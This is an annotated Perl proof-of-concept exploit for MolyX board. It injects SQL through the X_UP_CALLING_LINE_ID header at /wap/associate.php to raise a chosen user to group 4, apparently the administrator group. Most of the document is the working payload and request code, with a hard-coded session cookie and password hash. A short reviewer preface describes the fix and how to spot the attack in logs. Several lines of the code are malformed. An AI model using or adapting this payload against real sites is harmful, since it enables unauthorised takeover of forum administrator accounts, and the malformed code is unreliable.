# molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit
#!/usr/bin/perl -w
use IO::Socket;
## PROOF-OF-CONCEPT
## * Works only against PHP 5, or PHP 4 with GPC=off
##   (GPC presumably refers to magic_quotes_gpc -- confirm).
## Example:
## C:\>mlexp.pl 127.0.0.1 /bbs/ 1
## [~] prepare to connect...
## [+] connected
## [~] prepare to send data...
## [+] OK
## [~] wait for response...
## [+] Expoilted! Maybe Id=1 is Admin Now!!
##
## Reviewer summary (defensive reading of this listing):
##  * Root cause, as far as the payload shape shows: the value of the
##    X_UP_CALLING_LINE_ID request header reaches an SQL UPDATE issued by
##    /wap/associate.php inside a quoted string without escaping. The server
##    side is not on this page, so this is inferred -- confirm against the
##    MolyX source.
##  * Fix on the server: treat every request header as untrusted input; bind
##    the value as a query parameter, or accept it only when it matches a
##    strict digits-only pattern. Do not rely on magic_quotes_gpc for this.
##  * Detection: look in web/WAF logs for requests to wap/associate.php whose
##    X_UP_CALLING_LINE_ID value contains quotes, SQL keywords or comment
##    markers, and audit the user table for unexpected usergroupid changes.
##  * NOTE(review): the code below is kept exactly as published; it is not
##    guaranteed to parse or run as-is.

# Print usage and exit with status 1 unless three arguments were supplied.
if (@ARGV < 3)
{
print "\n\n";
print "|****************************************************************|\n";
print " mlexp.pl\n";
print " molyx board X_UP_CALLING_LINE_ID sql injection Remote Privilege Exploit (POC version)\n";
print " Usage: mlexp.pl <server> <folder> <user_id> \n";
print " e.g.: mlexp.pl 127.0.0.1 /bbs/ 1\n";
print " [~] <server> - server ip\n";
print " [~] <folder> - forum folder\n";
print " [~] <user_id> - user id \n";
print "|****************************************************************|\n";
print "\n\n";
exit(1);
}

# Positional arguments: target host, forum folder, numeric user id.
$server = $ARGV[0];
$folder = $ARGV[1];
$user_id = $ARGV[2];

# Plain TCP connection to port 80 of the target (no TLS).
print "[~] prepare to connect...\n";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "$socket error $!";
print "[+] connected\n";
print "[~] prepare to send data...\n";

# Hard-coded cookie string and User-Agent, sent verbatim in the request.
$cookie='redbbssessionid=5604730f9608848e; cnzz02=11; rtime=0; ltime=1168828899792; cnzz_eid=75851673-; redbbsuserid=52863; redbbspassword=5d0a98dc161ba9e55208f34e2b2ef473; redbbslanguage=zh-cn ';
$useragent='Opera/9.01 (Windows NT 5.1; U; zh-cn)';

# Header value carrying the injection: it closes the quoted value, appends a
# usergroupid assignment with its own WHERE clause, and opens a /* comment so
# the remainder of the server's statement is ignored. Group 4 is presumably
# the administrator group, judging by the success message below.
$evildata="0',usergroupid=4 where id=$user_id/*";

# Vulnerable endpoint named by the author, joined to the forum folder.
$script='/wap/associate.php?do=1';
$path =$folder.$script;
$count=$count+1;

# Assemble the raw HTTP request text header by header.
$message = "POST ".$folder." 
HTTP/1.1\r\n";
$message .= "Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1\r\n";
$message .= "Accept-Language: zh-CN,zh;q=0.9,en;q=0.8\r\n";
$message .= "Referer: http://".$server.$folder."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1\r\n";
$message .= "Host: ".$server."\r\n";
$message .= "User-Agent: ".$useragent."\r\n";
$message .= "Connection: Keep-Alive\r\n";
# The only attacker-controlled field of interest: a WAP-gateway style header
# that a normal browser does not send, which makes it a useful log/WAF signal.
$message .= "X_UP_CALLING_LINE_ID: ".$evildata."\r\n";
$message .= "Cookie: ".$cookie."\r\n";
$message .= "\r\n";
print $socket "$message";
print "[+] OK\n";
print "[~] wait for response...\n";

# Read the response line by line and look for the forum's
# "operation completed successfully" message (the Chinese text in the regex).
while ($answer = <$socket>)
{
if ($answer =~ /操作成功完成/)
print "[+] Expoilted! Maybe Id=$user_id is Admin Now!!\n"
else
print "[-] exploit failed\n";
}